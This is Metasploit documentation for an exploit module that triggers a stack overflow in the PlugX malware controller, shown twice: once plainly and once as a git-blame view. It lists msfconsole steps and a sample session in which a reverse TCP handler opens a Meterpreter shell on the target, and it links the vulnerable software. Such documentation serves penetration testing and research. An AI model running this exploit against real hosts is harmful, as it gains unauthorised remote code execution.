documentation/modules/exploit/windows/misc/plugx.md

## Vulnerable Application

  This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.
  This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.
  
  A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)

## Verification Steps

  1. Run the application
  2. Start msfconsole
  3. Do: `use exploit/windows/misc/plugx`
  4. Do: `set rhost [ip]`
  5. Do: `set target [target]`
  6. Do: `exploit`
  7. Click OK for the "PeDecodePacket" pop-up on the target
  8. Get a shell

## Scenarios

### Windows XP SP3 with PlugX type 1

```
msf > use exploit/windows/misc/plugx 
msf exploit(plugx) > set rhost 1.2.3.4
rhost => 1.2.3.4
msf exploit(plugx) > set target 1
target => 1
msf exploit(plugx) > set verbose true
verbose => true
msf exploit(plugx) > exploit

[*] Started reverse TCP handler on 1.2.3.99:4444 
[*] 1.2.3.4:13579 - Trying target PlugX Type I...
[*] 1.2.3.4:13579 - waiting for response
[*] Sending stage (956991 bytes) to 1.2.3.4
[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400
[*] 1.2.3.4:13579 - Server closed connection

meterpreter > getuid
Server username: WINXP\user
```
modules cleanup and add docs 2017-09-04 20:57:23 -04:00			`## Vulnerable Application`

			`This module exploits a stack overflow in the Plug-X Controller when handling a larger than expected message.`
			`This vulnerability can allow remote code execution however it causes a popup message to be displayed on the target before execution is gained.`

			`A vulnerable version of the software is available here: [PlugX type 1](https://github.com/rapid7/metasploit-framework/files/1243293/9f59a606c57217d98a5eea6846c8113aca07b203e0dcf17877b34a8b2308ade6.zip)`

verification to verification steps 2020-01-16 10:41:12 -05:00			`## Verification Steps`
modules cleanup and add docs 2017-09-04 20:57:23 -04:00
			`1. Run the application`
			`2. Start msfconsole`
			3. Do: `use exploit/windows/misc/plugx`
			4. Do: `set rhost [ip]`
			5. Do: `set target [target]`
			6. Do: `exploit`
			`7. Click OK for the "PeDecodePacket" pop-up on the target`
			`8. Get a shell`

			`## Scenarios`

			`### Windows XP SP3 with PlugX type 1`

			```
			`msf > use exploit/windows/misc/plugx`
			`msf exploit(plugx) > set rhost 1.2.3.4`
			`rhost => 1.2.3.4`
			`msf exploit(plugx) > set target 1`
			`target => 1`
			`msf exploit(plugx) > set verbose true`
			`verbose => true`
			`msf exploit(plugx) > exploit`

			`[*] Started reverse TCP handler on 1.2.3.99:4444`
			`[*] 1.2.3.4:13579 - Trying target PlugX Type I...`
			`[*] 1.2.3.4:13579 - waiting for response`
			`[*] Sending stage (956991 bytes) to 1.2.3.4`
			`[*] Meterpreter session 1 opened (1.2.3.99:4444 -> 1.2.3.4:1975) at 2017-09-04 19:53:07 -0400`
			`[*] 1.2.3.4:13579 - Server closed connection`

			`meterpreter > getuid`
			`Server username: WINXP\user`
			```